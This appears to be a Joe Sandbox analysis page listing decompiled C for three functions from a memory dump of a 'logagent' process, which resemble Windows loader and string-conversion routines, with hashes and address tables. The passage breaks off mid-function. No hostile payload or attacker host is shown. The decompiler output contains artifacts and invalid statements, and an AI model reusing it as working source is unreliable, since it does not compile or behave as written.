                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55df24aca99e985641ac988f85c3bb6b90d06f0d87ebbf3c1a2d11f6f2072b1a
                                              • Instruction ID: 7802f0a41b93960180cce30929ec34c614c1753709c8dce244dffb952bbf7736
                                              • Opcode Fuzzy Hash: 55df24aca99e985641ac988f85c3bb6b90d06f0d87ebbf3c1a2d11f6f2072b1a
                                              • Instruction Fuzzy Hash: C8B17CB0E10219EFCB28DF98C998AAEBFB6FF54304F14416DE405AB246D771AD41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E513A Relevance: .3, Instructions: 258COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E051E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x52ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E051FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E051D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L051D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E051FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E051CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x52ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E051FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                              0x051e5142
                                              0x051e514c
                                              0x051e5150
                                              0x051e5157
                                              0x051e5159
                                              0x051e515e
                                              0x051e5165
                                              0x051e5169
                                              0x051e516c
                                              0x051e5172
                                              0x051e5176
                                              0x051e517a
                                              0x051e517a
                                              0x051e517a
                                              0x051e517f
                                              0x05226d8b
                                              0x05226d8e
                                              0x05226d91
                                              0x05226d95
                                              0x05226d98
                                              0x05226d9c
                                              0x05226da0
                                              0x05226da3
                                              0x05226da7
                                              0x05226e26
                                              0x05226e26
                                              0x05226e2a
                                              0x051e51f9
                                              0x051e51f9
                                              0x051e51fe
                                              0x05226e33
                                              0x05226e33
                                              0x05226e39
                                              0x05226e3d
                                              0x05226e46
                                              0x05226e50
                                              0x00000000
                                              0x00000000
                                              0x05226e52
                                              0x05226e53
                                              0x05226e56
                                              0x05226e5d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05226e5f
                                              0x05226e67
                                              0x05226e77
                                              0x05226e7f
                                              0x05226e80
                                              0x05226e88
                                              0x05226e90
                                              0x05226e9f
                                              0x05226ea5
                                              0x05226ea9
                                              0x05226eb1
                                              0x05226ebf
                                              0x00000000
                                              0x00000000
                                              0x05226ecf
                                              0x05226ed3
                                              0x00000000
                                              0x00000000
                                              0x05226edb
                                              0x05226ede
                                              0x05226ee1
                                              0x05226ee8
                                              0x05226eeb
                                              0x05226eed
                                              0x05226ef0
                                              0x05226ef4
                                              0x05226ef8
                                              0x05226efc
                                              0x00000000
                                              0x00000000
                                              0x05226f0d
                                              0x05226f11
                                              0x05226f32
                                              0x05226f37
                                              0x05226f3b
                                              0x05226f3e
                                              0x05226f41
                                              0x05226f46
                                              0x00000000
                                              0x00000000
                                              0x05226f4c
                                              0x05226f50
                                              0x05226f50
                                              0x05226f54
                                              0x05226f62
                                              0x05226f65
                                              0x05226f6d
                                              0x05226f7b
                                              0x05226f7b
                                              0x05226f93
                                              0x05226f98
                                              0x05226fa0
                                              0x05226fa6
                                              0x05226fb3
                                              0x05226fb6
                                              0x05226fbf
                                              0x05226fc1
                                              0x05226fd5
                                              0x05226fda
                                              0x05226fda
                                              0x05226fdd
                                              0x05226fe2
                                              0x05226fe7
                                              0x05226feb
                                              0x05226fef
                                              0x05226ff3
                                              0x051e520c
                                              0x051e520c
                                              0x051e520f
                                              0x051e5215
                                              0x051e5234
                                              0x051e523a
                                              0x051e523a
                                              0x051e5244
                                              0x051e5245
                                              0x051e5246
                                              0x051e5251
                                              0x051e5251
                                              0x05226f13
                                              0x05226f17
                                              0x05226f17
                                              0x05226f18
                                              0x05226f1b
                                              0x05226f1f
                                              0x05226f23
                                              0x00000000
                                              0x05226f28
                                              0x051e5204
                                              0x051e5204
                                              0x051e5208
                                              0x00000000
                                              0x051e5208
                                              0x051e5185
                                              0x051e5188
                                              0x051e518a
                                              0x051e518e
                                              0x051e5195
                                              0x05226db1
                                              0x05226db5
                                              0x05226db9
                                              0x051e519b
                                              0x051e519b
                                              0x051e519e
                                              0x051e51a7
                                              0x051e51a9
                                              0x051e51a9
                                              0x051e51b5
                                              0x051e51b8
                                              0x051e51bb
                                              0x051e51be
                                              0x051e51c1
                                              0x051e51c5
                                              0x051e51c9
                                              0x051e51cd
                                              0x051e51cd
                                              0x051e51d8
                                              0x051e51dc
                                              0x051e51e0
                                              0x05226dcc
                                              0x05226dd0
                                              0x05226dd5
                                              0x05226ddd
                                              0x05226de1
                                              0x05226de1
                                              0x05226de5
                                              0x05226deb
                                              0x05226df1
                                              0x05226df7
                                              0x05226dfd
                                              0x05226e01
                                              0x05226e05
                                              0x05226e09
                                              0x05226e0d
                                              0x05226e11
                                              0x05226e11
                                              0x051e51eb
                                              0x05226e1a
                                              0x05226e1f
                                              0x05226e21
                                              0x05226e23
                                              0x00000000
                                              0x051e51f1
                                              0x051e51f1
                                              0x00000000
                                              0x051e51f1

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ddf1f3a9d2bded1c45bc8876c9fe0be0b926b8fe17ef640dffd7df36bb8b6824
                                              • Instruction ID: 83024c476f55ef57067a3574297dd045fe90d5485ebd42bd48c77f08f78e7447
                                              • Opcode Fuzzy Hash: ddf1f3a9d2bded1c45bc8876c9fe0be0b926b8fe17ef640dffd7df36bb8b6824
                                              • Instruction Fuzzy Hash: 6DC123756083819FD354CF28C580A6AFBF2BF88308F14496EF89A8B352D771E945CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E03E2 Relevance: .3, Instructions: 254COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E051E03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x52ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E051E0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E051FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E051CB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x52a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E051D7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E051D7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05237016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E051F9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E052369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x52a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0523A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x52a7bd8;
						if( *0x52a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E051F95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E051F99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05233540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E051BB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E051FAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x52a8474 - 3;
										if( *0x52a8474 != 3) {
											 *0x52a79dc =  *0x52a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E051D7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E051D7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05237016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x52a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x52a7b00; // 0x0
							asm("ror esi, cl");
							 *0x52ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E051F95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E051C7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                              0x051e03f1
                                              0x051e03f7
                                              0x051e03f9
                                              0x051e03fb
                                              0x051e03fd
                                              0x051e0400
                                              0x051e040a
                                              0x05224c7a
                                              0x051e0537
                                              0x051e0547
                                              0x051e0410
                                              0x051e0410
                                              0x051e0414
                                              0x051e0417
                                              0x051e041a
                                              0x051e0421
                                              0x051e0424
                                              0x051e042b
                                              0x051e043b
                                              0x051e043e
                                              0x051e043f
                                              0x051e043f
                                              0x051e0446
                                              0x051e0449
                                              0x051e044c
                                              0x051e044f
                                              0x051e0459
                                              0x05224c8d
                                              0x051e045f
                                              0x051e045f
                                              0x051e045f
                                              0x051e0467
                                              0x05224c97
                                              0x05224c9d
                                              0x05224ca4
                                              0x05224caa
                                              0x05224caf
                                              0x05224cb1
                                              0x05224cc3
                                              0x05224cb3
                                              0x05224cbc
                                              0x05224cbc
                                              0x05224cc8
                                              0x05224ccb
                                              0x05224cd7
                                              0x05224cda
                                              0x05224cdf
                                              0x05224cdf
                                              0x05224ccb
                                              0x05224ca4
                                              0x051e046d
                                              0x051e046f
                                              0x051e046f
                                              0x051e0471
                                              0x051e0476
                                              0x051e047a
                                              0x051e047b
                                              0x051e0483
                                              0x051e0489
                                              0x051e048d
                                              0x00000000
                                              0x00000000
                                              0x05224ce9
                                              0x05224cef
                                              0x05224d22
                                              0x05224d22
                                              0x00000000
                                              0x05224d22
                                              0x05224cf1
                                              0x05224cf7
                                              0x00000000
                                              0x00000000
                                              0x05224cf9
                                              0x05224cff
                                              0x00000000
                                              0x00000000
                                              0x05224d05
                                              0x05224d07
                                              0x00000000
                                              0x00000000
                                              0x05224d0d
                                              0x05224d0f
                                              0x05224d14
                                              0x05224d16
                                              0x00000000
                                              0x00000000
                                              0x05224d1c
                                              0x05224d1c
                                              0x051e0499
                                              0x051e0535
                                              0x051e0535
                                              0x00000000
                                              0x051e0535
                                              0x051e04a6
                                              0x05224d2c
                                              0x05224d37
                                              0x05224d39
                                              0x05224d3b
                                              0x00000000
                                              0x00000000
                                              0x05224d41
                                              0x05224d48
                                              0x051e0527
                                              0x051e052b
                                              0x051e052d
                                              0x051e0530
                                              0x051e0530
                                              0x00000000
                                              0x051e052b
                                              0x05224d4e
                                              0x051e04ac
                                              0x051e04ac
                                              0x051e04af
                                              0x051e04b2
                                              0x051e04b7
                                              0x051e04b9
                                              0x051e04bb
                                              0x051e04bd
                                              0x051e04bf
                                              0x051e04c5
                                              0x051e04c9
                                              0x05224d53
                                              0x05224d59
                                              0x05224db9
                                              0x05224dba
                                              0x05224dbf
                                              0x05224dc2
                                              0x05224dc4
                                              0x05224dc7
                                              0x05224dce
                                              0x00000000
                                              0x05224dce
                                              0x05224d5b
                                              0x05224d61
                                              0x00000000
                                              0x00000000
                                              0x05224d63
                                              0x05224d69
                                              0x00000000
                                              0x00000000
                                              0x05224d6b
                                              0x05224d6e
                                              0x05224d74
                                              0x05224d76
                                              0x05224d7c
                                              0x05224d7e
                                              0x05224d84
                                              0x05224d89
                                              0x05224d8c
                                              0x05224d8d
                                              0x05224d92
                                              0x05224d95
                                              0x05224d96
                                              0x05224d98
                                              0x05224d9a
                                              0x05224d9f
                                              0x05224da4
                                              0x05224da6
                                              0x05224da8
                                              0x05224daf
                                              0x05224db1
                                              0x05224db1
                                              0x05224daf
                                              0x05224da6
                                              0x05224d84
                                              0x05224d7c
                                              0x00000000
                                              0x05224d74
                                              0x051e04d6
                                              0x05224de1
                                              0x051e04dc
                                              0x051e04dc
                                              0x051e04dc
                                              0x051e04e4
                                              0x05224deb
                                              0x05224df1
                                              0x05224df8
                                              0x05224dfe
                                              0x05224e03
                                              0x05224e05
                                              0x05224e17
                                              0x05224e07
                                              0x05224e10
                                              0x05224e10
                                              0x05224e1c
                                              0x05224e1f
                                              0x05224e35
                                              0x05224e35
                                              0x05224e1f
                                              0x05224df8
                                              0x051e04f1
                                              0x051e04fa
                                              0x05224e3f
                                              0x05224e47
                                              0x05224e5b
                                              0x05224e61
                                              0x05224e67
                                              0x05224e69
                                              0x05224e71
                                              0x05224e73
                                              0x051e0500
                                              0x051e0500
                                              0x051e0500
                                              0x051e04fa
                                              0x051e0508
                                              0x051e051d
                                              0x051e051d
                                              0x051e051f
                                              0x051e0524
                                              0x00000000
                                              0x051e0524
                                              0x051e0515
                                              0x051e0517
                                              0x05224e7a
                                              0x05224e7c
                                              0x00000000
                                              0x00000000
                                              0x05224e85
                                              0x00000000
                                              0x05224e85
                                              0x00000000
                                              0x051e0517

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d32fb00aa05e32eb5888c68150b1d3a7713e7bb0a7f4cbea43a4903596f59b6
                                              • Instruction ID: 85a02f12b8c8ef3b91ec8c4e79320f5ec4757f4d2318c79808d9bc3bce75a26a
                                              • Opcode Fuzzy Hash: 0d32fb00aa05e32eb5888c68150b1d3a7713e7bb0a7f4cbea43a4903596f59b6
                                              • Instruction Fuzzy Hash: 39912235F14A25ABEF21EA68C84CBBD7BA5FF09720F050261E915AB2D1DBB49D00C7C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EEBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051EEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E051EED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
